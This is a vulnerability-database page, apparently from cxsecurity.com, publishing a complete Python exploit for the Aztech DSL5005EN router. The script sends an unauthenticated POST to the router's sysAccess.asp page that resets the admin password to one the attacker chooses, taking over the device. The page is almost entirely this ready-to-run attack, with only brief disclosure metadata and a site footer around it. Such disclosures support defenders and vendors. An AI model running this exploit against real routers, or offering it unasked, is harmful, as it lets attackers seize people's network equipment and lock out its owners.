Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)

2025.03.25
ir Amir Hossein Jamshidi (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-306

# Exploit Title: Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated) # Date: 2025-02-26 # Exploit Author: Amir Hossein Jamshidi # Vendor Homepage: https://www.aztech.com # Version: DSL5005EN # Tested on: Linux # CVE: N/A # Firmware Version: 249.150.2-005 import requests import argparse print(''' ################################################################################# # aztech DSL5005EN router/modem - admin password change (Unauthenticated) # # BY: Amir Hossein Jamshidi # # Mail: amirhosseinjamshidi64@gmail.com # # github: https://github.com/amirhosseinjamshidi64 # # Usage: python Exploit.py --ip TRAGET_IP --password PASSWORD # ################################################################################# ''') def change_password(ip_address, password): """ Changes the password of a device at the given IP address. Args: ip_address: The IP address of the device (e.g., "192.168.1.1"). password: The new password to set. """ url = f"http://{ip_address}/cgi-bin/sysAccess.asp" origin = f"http://{ip_address}" referer = f"http://{ip_address}/cgi-bin/sysAccess.asp" payload = { "saveFlag": "1", "adminFlag": "1", "SaveBtn": "SAVE", "uiViewTools_Password": password, "uiViewTools_PasswordConfirm": password } headers = { "Cache-Control": "max-age=0", "Accept-Language": "en-US,en;q=0.9", "Origin": origin, "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": referer, "Connection": "keep-alive" } try: response = requests.post(url, data=payload, headers=headers, timeout=10) if response.status_code == 200: print(f"Password change request to {ip_address} successful!") print(f"Username: admin") print(f"Password: {password}") else: print(f"Request to {ip_address} failed with status code: {response.status_code}") print(f"Response content:\n{response.text}") # Print response for debugging except requests.exceptions.RequestException as e: print(f"An error occurred: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Change password of a device.") parser.add_argument("--ip", dest="ip_address", required=True, help="The IP address of the device.") parser.add_argument("--password", dest="password", required=True, help="The new password to set.") args = parser.parse_args() change_password(args.ip_address, args.password)


See this note in RAW Version
Vote for this issue:
50%
50%

Comment it here.
Copyright 2025, cxsecurity.com

 

Back to Top